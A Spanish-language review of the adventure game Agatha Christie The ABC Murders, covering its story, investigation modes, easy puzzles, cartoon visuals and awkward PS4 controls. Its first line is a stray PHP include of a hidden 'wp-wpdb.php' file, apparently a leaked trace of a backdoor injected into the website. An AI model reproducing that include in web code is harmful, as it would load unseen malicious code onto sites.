if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Agatha Christie The ABC Murders – La Fortaleza de LeChuck

Análisis Agatha Christie The ABC Murders

Os suena el nombre de Agatha Christie, ¿verdad? La popular escritora de novela negra, quien nos ha dejado un gran legado literario. Una de sus novelas, «El misterio de la guía de ferrocarriles», ha sido adaptada a videojuego bajo el nombre de Agatha Christie The ABC Murders donde nos pondremos en la piel del detective Hércules Poirot para detener a un peligroso asesino en serie.

Agatha-Christie-The-ABC-Murders

De la obra literaria de Agatha Christie sin duda pueden salir grandes aventuras gráficas, y a lo largo de los albores del género, hemos visto como se han adaptado diversas novelas con buenos resultados. En este caso, Microids ha sido la compañía encargada del desarrollo del título y en su currículum figuran grandes aventuras point and click como los Syberia, por lo tanto, el juego estaba en buenas manos. Curiosamente, este no es el primer juego de la novela, ya que existe una aventura con el mismo nombre lanzada por otro estudio para Nintendo DS en 2009, sin embargo, no levantó demasiada expectación quizá eclipsada por el catálogo apabullante de la exitosa portátil.

Agatha Christie The ABC Murders trata el caso de un asesino en serie que mata a sus víctimas por orden alfabético, dejando la guía ABC de ferrocarriles al lado de cada cuerpo mientras lleva a cabo un siniestro juego con Hércules Poirot, el detective que investiga el caso, a quien alerta con antelación de las ubicaciones de los crímenes, pero Poirot siempre llega demasiado tarde. Intrigado por la mente y la metodología del psicópata, Poirot se desplaza por toda Inglaterra con la intención de dar caza al asesino.

Agatha-Christie-The-ABC-Murders-2

Como ocurre en otras historias detectivescas, el juego se divide en varios episodios que constituyen un solo caso y todos ellos dan comienzo con una carta del homicida que nos da indicaciones de un inminente asesinato. A continuación, viajaremos a la escena del crimen para ver el cuerpo, investigar la localización e interrogar a los testigos con el fin recopilar pruebas suficientes que nos permitan realizar una reconstrucción de los hechos.

Jugablemente, Agatha Christie The ABC Murders sigue los estándares de los point and click. Tenemos que mover el cursor por los hotspots y objetos para mirarlos y/o recogerlos y así obtener información valiosa que nos permitirá conocer datos concretos del asesinato y facilitará que un testigo coopere. Durante el caso Poirot se formulará preguntas, las cuales se mostrarán en pantalla y en el menú, y son los objetivos que debemos cumplir a corto plazo: Hora de la muerte, móvil del asesinato, arma utilizada, etc. La observación será vital para hallar pistas y a menudo saltará en pantalla el «modo observación» y la vista cambiará a primera persona para que recopilemos el máximo número de pistas que se indican en pantalla. Este modo no solo sirve para objetos, los cuales se podrán mover 360º, sino también para personajes ya sean testigos, sospechosos, familiares de la víctima o agentes de la ley. En el caso de los personajes, observarlos nos proporcionará pistas sobre su carácter y estado, lo cual facilitará el interrogatorio al seleccionar las líneas de diálogo más adecuadas y conseguiremos «puntos de ego«, una especie de recompensa por nuestro buen hacer.

Agatha-Christie-The-ABC-Murders-3

Como buena aventura gráfica, tendremos un buen puñado de puzles para resolver en el modo «reflexión«. La mayoría son rompecabezas que consisten en mover y girar elementos para abrir determinados objetos que nos proporcionarán pistas, pero con un simple prueba y error en menos de unos segundos daremos con la solución. También se nos pone a prueba en el modo «pequeñas células grises«, una especie de cuestionario donde resolveremos las dudas del caso seleccionando los indicios correctos. En cuando contestemos correctamente a todas las cuestiones tendremos que realizar la reconstrucción del crimen y en pantalla se irá reproduciendo la secuencia del asesinato en base a las opciones que elijamos. Ciertamente, los puzles son simples y no suponen un desafío, además, el juego ofrece pistas innecesarias. Posiblemente, los jugadores que aprecian los buenos puzles en este tipo de aventuras se llevarán una decepción.

Agatha-Christie-The-ABC-Murders4

Hablemos del apartado visual, ya que Agatha Christie The ABC Murders cuenta con un estilo muy resultón, con gráficos coloridos estilo cartoon que recuerdan a Broken Sword, sin embargo, los colores vivos del título chocan con una trama adulta de novela negra. En cuanto al diseño de personajes y localizaciones, son bastante detalladas y bien construidas, especialmente me gustó la recreación de algunos lugares de época y su nivel de detalle.

Por último, quería comentar unos aspectos generales que me han molestado del juego, para empezar, los subtítulos, ¡son minúsculos! y eso que mi TV tiene unas dimensiones considerables pero aún así me costaba leer los diálogos. También resulta un engorro jugar con mando, jugué en la versión de PS4 y tener que usar un stick para mover al personaje y el otro para el cursor es bastante molesto. Por otro lado, en determinadas áreas el personaje se mueve leeentoo y puede poner a prueba nuestra paciencia.

Agatha Christie The ABC Murders es una aventura gráfica entretenida, ideal para jugones que no buscan desafíos, sino disfrutar de una historia de investigación con gráficos agradables y accesible para todo tipo de públicos.

Podéis adquirir el juego a buen precio para PC Steam en formato digital en el siguiente enlace y en formato físico en este otro.